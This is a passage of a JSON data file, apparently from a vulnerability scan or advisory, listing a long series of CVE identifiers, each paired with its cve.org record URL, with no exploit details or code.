"url": "https://www.cve.org/CVERecord?id=CVE-2020-2781"
},
{
"name": "CVE-2023-28322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28322"
},
{
"name": "CVE-2018-10804",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-10804"
},
{
"name": "CVE-2025-38159",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38159"
},
{
"name": "CVE-2022-0907",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0907"
},
{
"name": "CVE-2021-3421",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3421"
},
{
"name": "CVE-2022-21305",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21305"
},
{
"name": "CVE-2025-38066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38066"
},
{
"name": "CVE-2023-29405",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29405"
},
{
"name": "CVE-2021-3670",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3670"
},
{
"name": "CVE-2021-38297",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-38297"
},
{
"name": "CVE-2025-4373",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4373"
},
{
"name": "CVE-2015-4790",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4790"
},
{
"name": "CVE-2025-4598",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4598"
},
{
"name": "CVE-2025-27144",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27144"
},
{
"name": "CVE-2025-21836",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21836"
},
{
"name": "CVE-2025-21715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21715"
},
{
"name": "CVE-2024-6174",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6174"
},
{
"name": "CVE-2022-30629",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30629"
},
{
"name": "CVE-2020-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10735"
},
{
"name": "CVE-2025-38305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38305"
},
{
"name": "CVE-2020-14556",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14556"
},
{
"name": "CVE-2025-38067",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38067"
},
{
"name": "CVE-2025-50085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50085"
},
{
"name": "CVE-2025-21781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21781"
},
{
"name": "CVE-2024-58054",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58054"
},
{
"name": "CVE-2024-43398",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43398"
},
{
"name": "CVE-2020-14792",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14792"
},
{
"name": "CVE-2019-16776",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16776"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2023-6779",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6779"
},
{
"name": "CVE-2022-28738",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28738"
},
{
"name": "CVE-2023-5363",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5363"
},
{
"name": "CVE-2024-8508",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8508"
},
{
"name": "CVE-2023-45289",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45289"
},
{
"name": "CVE-2025-41248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41248"
},
{
"name": "CVE-2022-49043",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49043"
},
{
"name": "CVE-2015-2624",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2624"
},
{
"name": "CVE-2022-2068",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2068"
},
{
"name": "CVE-2025-40364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40364"
},
{
"name": "CVE-2023-29491",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29491"
},
{
"name": "CVE-2025-38068",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38068"
},
{
"name": "CVE-2025-61985",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61985"
},
{
"name": "CVE-2013-2064",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-2064"
},
{
"name": "CVE-2025-38401",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38401"
},
{
"name": "CVE-2025-21772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21772"
},
{
"name": "CVE-2021-20266",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20266"
},
{
"name": "CVE-2022-21271",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21271"
},
{
"name": "CVE-2024-58070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58070"
},
{
"name": "CVE-2025-61919",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61919"
},
{
"name": "CVE-2023-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25193"
},
{
"name": "CVE-2024-34447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34447"
},
{
"name": "CVE-2020-25663",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25663"
},
{
"name": "CVE-2022-0156",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0156"
},
{
"name": "CVE-2025-21914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21914"
},
{
"name": "CVE-2024-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58057"
},
{
"name": "CVE-2025-0306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0306"
},
{
"name": "CVE-2025-1371",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1371"
},
{
"name": "CVE-2024-12798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12798"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2024-58007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58007"
},
{
"name": "CVE-2023-1355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1355"
},
{
"name": "CVE-2025-21995",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21995"
},
{
"name": "CVE-2023-0466",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
},
{
"name": "CVE-2025-21868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21868"
},
{
"name": "CVE-2025-0938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0938"
},
{
"name": "CVE-2025-5372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5372"
},
{
"name": "CVE-2022-27782",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27782"
},
{
"name": "CVE-2022-37967",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37967"
},
{
"name": "CVE-2022-22844",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22844"
},
{
"name": "CVE-2025-21915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21915"
},
{
"name": "CVE-2019-13232",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13232"
},
{
"name": "CVE-2025-27210",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27210"
},
{
"name": "CVE-2025-38102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38102"
},
{
"name": "CVE-2024-33600",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33600"
},
{
"name": "CVE-2025-21792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21792"
},
{
"name": "CVE-2015-2654",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-2654"
},
{
"name": "CVE-2025-55560",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55560"
},
{
"name": "CVE-2025-21728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21728"
},
{
"name": "CVE-2024-58018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58018"
},
{
"name": "CVE-2023-42669",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42669"
},
{
"name": "CVE-2022-1210",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1210"
},
{
"name": "CVE-2025-61771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61771"
},
{
"name": "CVE-2023-0465",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
},
{
"name": "CVE-2025-61770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61770"
},
{
"name": "CVE-2022-32148",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32148"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2015-4778",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4778"
},
{
"name": "CVE-2023-42670",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42670"
},
{
"name": "CVE-2022-4203",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4203"
},
{
"name": "CVE-2024-58090",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58090"
},
{
"name": "CVE-2025-59842",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59842"
},
{
"name": "CVE-2025-49125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-49125"
},
{
"name": "CVE-2025-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50106"
},
{
"name": "CVE-2024-27766",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27766"
},
{
"name": "CVE-2025-37958",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37958"
},
{
"name": "CVE-2025-21714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21714"
},
{
"name": "CVE-2024-58078",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58078"
},
{
"name": "CVE-2023-32636",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
},
{
"name": "CVE-2023-6277",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6277"
},
{
"name": "CVE-2025-48060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48060"
},
{
"name": "CVE-2025-21855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21855"
},
{
"name": "CVE-2025-38399",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38399"
},
{
"name": "CVE-2025-21972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21972"
},
{
"name": "CVE-2025-38065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38065"
},
{
"name": "CVE-2025-38459",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38459"
},
{
"name": "CVE-2024-21510",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21510"
},
{
"name": "CVE-2023-34153",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34153"
},
{
"name": "CVE-2023-3618",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3618"
},
{
"name": "CVE-2020-14153",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14153"
},
{
"name": "CVE-2022-1114",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1114"
},
{
"name": "CVE-2023-48233",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48233"
},
{
"name": "CVE-2025-38412",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38412"
},
{
"name": "CVE-2025-38031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38031"
},
{
"name": "CVE-2023-4813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4813"
},
{
"name": "CVE-2022-21626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21626"
},
{
"name": "CVE-2011-2207",
"url": "https://www.cve.org/CVERecord?id=CVE-2011-2207"
},
{
"name": "CVE-2025-54874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54874"
},
{
"name": "CVE-2017-3617",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3617"
},
{
"name": "CVE-2024-53124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53124"
},
{
"name": "CVE-2025-38293",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38293"
},
{
"name": "CVE-2025-58057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58057"
},
{
"name": "CVE-2025-21830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21830"
},
{
"name": "CVE-2018-12600",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12600"
},
{
"name": "CVE-2025-4877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4877"
},
{
"name": "CVE-2021-41771",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41771"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2020-14781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14781"
},
{
"name": "CVE-2016-3189",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-3189"
},
{
"name": "CVE-2023-4154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4154"
},
{
"name": "CVE-2025-38184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38184"
},
{
"name": "CVE-2017-3615",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3615"
},
{
"name": "CVE-2022-0714",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0714"
},
{
"name": "CVE-2023-45290",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45290"
},
{
"name": "CVE-2023-28320",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28320"
},
{
"name": "CVE-2025-9340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9340"
},
{
"name": "CVE-2023-24758",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-24758"
},
{
"name": "CVE-2025-55552",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55552"
},
{
"name": "CVE-2025-30683",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30683"
},
{
"name": "CVE-2025-30699",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30699"
},
{
"name": "CVE-2025-61921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61921"
},
{
"name": "CVE-2024-4030",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4030"
},
{
"name": "CVE-2025-27587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27587"
},
{
"name": "CVE-2016-7531",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-7531"
},
{
"name": "CVE-2006-3082",
"url": "https://www.cve.org/CVERecord?id=CVE-2006-3082"
},
{
"name": "CVE-2023-5341",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5341"
},
{
"name": "CVE-2025-8534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8534"
},
{
"name": "CVE-2025-21767",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21767"
},
{
"name": "CVE-2025-3262",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3262"
},
{
"name": "CVE-2025-21986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21986"
},
{
"name": "CVE-2025-22866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22866"
},
{
"name": "CVE-2025-1390",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1390"
},
{
"name": "CVE-2024-33599",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33599"
},
{
"name": "CVE-2023-34968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34968"
},
{
"name": "CVE-2024-0743",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0743"
},
{
"name": "CVE-2025-21961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21961"
},
{
"name": "CVE-2025-38458",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38458"
},
{
"name": "CVE-2025-6297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6297"
},
{
"name": "CVE-2016-10062",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10062"
},
{
"name": "CVE-2025-21764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21764"
},
{
"name": "CVE-2024-57974",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57974"
},
{
"name": "CVE-2024-58093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58093"
},
{
"name": "CVE-2023-34152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34152"
},
{
"name": "CVE-2022-43249",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43249"
},
{
"name": "CVE-2025-38034",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38034"
},
{
"name": "CVE-2024-58085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58085"
},
{
"name": "CVE-2024-34158",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34158"
},
{
"name": "CVE-2017-3608",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3608"
},
{
"name": "CVE-2025-47268",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47268"
},
{
"name": "CVE-2025-21690",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21690"
},
{
"name": "CVE-2025-30754",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30754"
},
{
"name": "CVE-2024-57996",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57996"
},
{
"name": "CVE-2025-38135",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38135"
},
{
"name": "CVE-2023-28484",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28484"
},
{
"name": "CVE-2022-43242",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43242"
},
{
"name": "CVE-2019-2708",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-2708"
},
{
"name": "CVE-2025-38312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38312"
},
{
"name": "CVE-2016-0692",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-0692"
},
{
"name": "CVE-2019-14844",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14844"
},
{
"name": "CVE-2022-21366",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21366"
},
{
"name": "CVE-2022-30630",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30630"
},
{
"name": "CVE-2025-22233",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22233"
},
{
"name": "CVE-2025-38464",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38464"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-21838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21838"
},
{
"name": "CVE-2025-21982",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21982"
},
{
"name": "CVE-2025-21867",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21867"
},
{
"name": "CVE-2025-21666",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21666"
},
{
"name": "CVE-2023-0802",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0802"
},
{
"name": "CVE-2025-53859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53859"
},
{
"name": "CVE-2023-46219",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46219"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-21828",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21828"
},
{
"name": "CVE-2023-47038",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-47038"
},
{
"name": "CVE-2025-23167",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23167"
},
{
"name": "CVE-2025-38363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38363"
},
{
"name": "CVE-2025-21704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21704"
},
{
"name": "CVE-2025-21936",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21936"
},
{
"name": "CVE-2022-0865",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0865"
},
{
"name": "CVE-2023-5981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5981"
},
{
"name": "CVE-2025-38319",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38319"
},
{
"name": "CVE-2025-43859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43859"
},
{
"name": "CVE-2024-58013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58013"
},
{
"name": "CVE-2022-0529",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0529"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2016-7514",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-7514"
},
{
"name": "CVE-2015-4782",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4782"
},
{
"name": "CVE-2025-21909",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21909"
},
{
"name": "CVE-2022-2056",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2056"
},
{
"name": "CVE-2025-9092",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9092"
},
{
"name": "CVE-2025-21766",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21766"
},
{
"name": "CVE-2025-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38457"
},
{
"name": "CVE-2024-54677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54677"
},
{
"name": "CVE-2021-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3598"
},
{
"name": "CVE-2025-21880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21880"
},
{
"name": "CVE-2025-50094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50094"
},
{
"name": "CVE-2021-35559",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35559"
},
{
"name": "CVE-2025-21959",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21959"
},
{
"name": "CVE-2024-38809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38809"
},
{
"name": "CVE-2025-38212",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38212"
},
{
"name": "CVE-2017-3610",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3610"
},
{
"name": "CVE-2023-1264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1264"
},
{
"name": "CVE-2023-0217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0217"
},
{
"name": "CVE-2024-58266",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58266"
},
{
"name": "CVE-2025-38298",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38298"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2025-50098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50098"
},
{
"name": "CVE-2022-43552",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43552"
},
{
"name": "CVE-2018-1000076",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000076"
},
{
"name": "CVE-2022-4293",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4293"
},
{
"name": "CVE-2025-37974",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37974"
},
{
"name": "CVE-2025-5915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5915"
},
{
"name": "CVE-2024-57834",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57834"
},
{
"name": "CVE-2025-55197",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55197"
},
{
"name": "CVE-2022-32743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-32743"
},
{
"name": "CVE-2025-55558",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55558"
},
{
"name": "CVE-2022-21291",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21291"
},
{
"name": "CVE-2024-58017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58017"
},
{
"name": "CVE-2025-5917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5917"
},
{
"name": "CVE-2025-26603",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-26603"
},
{
"name": "CVE-2023-35116",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35116"
},
{
"name": "CVE-2025-38078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38078"
},
{
"name": "CVE-2025-21809",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21809"
},
{
"name": "CVE-2025-38419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38419"
},
{
"name": "CVE-2024-45490",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45490"
},
{
"name": "CVE-2021-32490",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32490"
},
{
"name": "CVE-2020-27768",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27768"
},
{
"name": "CVE-2024-38820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38820"
},
{
"name": "CVE-2025-50086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50086"
},
{
"name": "CVE-2016-5118",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-5118"
},
{
"name": "CVE-2022-3786",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3786"
},
{
"name": "CVE-2023-46045",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46045"
},
{
"name": "CVE-2025-37889",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37889"
},
{
"name": "CVE-2021-3995",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-3995"
},
{
"name": "CVE-2015-4788",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4788"
},
{
"name": "CVE-2025-55557",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55557"
},
{
"name": "CVE-2024-12085",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12085"
},
{
"name": "CVE-2022-24599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24599"
},
{
"name": "CVE-2025-21981",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21981"
},
{
"name": "CVE-2025-38211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38211"
},
{
"name": "CVE-2025-2999",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2999"
},
{
"name": "CVE-2023-48795",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48795"
},
{
"name": "CVE-2025-21910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21910"
},
{
"name": "CVE-2021-35452",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35452"
},
{
"name": "CVE-2025-6965",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6965"
},
{
"name": "CVE-2023-28319",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28319"
},
{
"name": "CVE-2021-35565",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35565"
},
{
"name": "CVE-2020-10251",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10251"
},
{
"name": "CVE-2024-11584",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11584"
},
{
"name": "CVE-2024-45491",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45491"
},
{
"name": "CVE-2025-50182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50182"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2020-2981",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-2981"
},
{
"name": "CVE-2025-21745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21745"
},
{
"name": "CVE-2025-21791",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21791"
},
{
"name": "CVE-2020-18781",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-18781"
},
{
"name": "CVE-2025-7709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7709"
},
{
"name": "CVE-2024-52559",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52559"
},
{
"name": "CVE-2025-38077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38077"
},
{
"name": "CVE-2025-38251",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38251"
},
{
"name": "CVE-2022-22576",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22576"
},
{
"name": "CVE-2025-38120",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38120"
},
{
"name": "CVE-2017-7186",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7186"
},
{
"name": "CVE-2025-38285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38285"
},
{
"name": "CVE-2025-59375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
},
{
"name": "CVE-2025-37750",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37750"
},
{
"name": "CVE-2021-39293",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-39293"
},
{
"name": "CVE-2025-21795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21795"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2025-22014",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22014"
},
{
"name": "CVE-2025-38161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38161"
},
{
"name": "CVE-2025-9640",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9640"
},
{
"name": "CVE-2022-1897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1897"
},
{
"name": "CVE-2022-43248",
